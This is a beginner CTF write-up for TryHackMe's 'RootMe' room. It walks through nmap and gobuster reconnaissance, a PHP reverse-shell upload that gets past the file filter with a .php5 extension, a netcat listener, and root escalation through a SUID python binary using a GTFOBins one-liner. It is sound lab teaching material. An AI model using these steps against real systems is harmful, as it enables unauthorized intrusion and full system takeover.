CTF Writeups

TryHackMe : RootMe Writeup

Writeup on the ‘Root Me’ room on THM

WSGSec

3 min readAug 4, 2021

TryHackMe | RootMe

A ctf for beginners, can you root me?

tryhackme.com

2020–06–18 | WSGSec

Task 1

N/A

Task2 Recon

Started off with an Nmap Scan :

$ nmap -A -p- $IP      
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-18 19:04 EDT
Nmap scan report for 10.10.206.92
Host is up (0.043s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.87 seconds

Scan the machine, how many ports are open?

Answer= 2

What version of Apache is running?

Answer = 2.4.29

What service is running on port 22?

Answer = ssh

Find directories on the web server using the GoBuster tool.

─$ gobuster dir -u http://10.10.206.92/  -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.206.92/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/18 19:10:16 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/css                  (Status: 301) [Size: 310] [--> http://10.10.206.92/css/]
/js                   (Status: 301) [Size: 309] [--> http://10.10.206.92/js/] 
/panel                (Status: 301) [Size: 312] [--> http://10.10.206.92/panel/]
/server-status        (Status: 403) [Size: 277]                                 
/uploads              (Status: 301) [Size: 314] [--> http://10.10.206.92/uploads/]
                                                                                  
===============================================================
2021/06/18 19:10:42 Finished
===============================================================

What is the hidden directory?

Answer = /panel/

‘/Panel/’ shows an upload page no doubt linked to /uploads/

Task3 Getting a shell

Now time to get a shell on the box. The /panel may be able to upload malicious files to it and execute.

user.txt flag

php reverse shell upload filter bypass using a .php5 extension

└─$ nc -lvnp 8888                                                                                                  1 ⨯
listening on [any] 8888 ...
connect to [10.11.34.30] from (UNKNOWN) [10.10.206.92] 41228
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 23:42:56 up 40 min,  0 users,  load average: 0.09, 0.03, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd var
$ cd www
$ ls
html
user.txt
$ cat user.txt  
************
$

Answer = ****

Task 4 Privilege Escalation

Search for files with SUID permission, which file is weird?

Now is time to enumerate the SUID binaries o nthe machine using the following :

bash-4.4$ find / -user root -perm /4000 2</dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec

Answer = /usr/bin/python/

Find a form to escalate your privileges.

Found a command to be used on GTFOBins, a list of binaries used to break out of restricted shells. The below command allows us to execute a bash shell on root through importing the os python module:

bash-4.4$ ./usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# whoami
root
#

root.txt flag

We are now root and can now cat the flag:

# ls
bin    dev   initrd.img      lib64   mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib         media   proc  sbin  swap.img  usr  vmlinuz.old
# cd root
# ls
root.txt
# cat root.txt
****************
#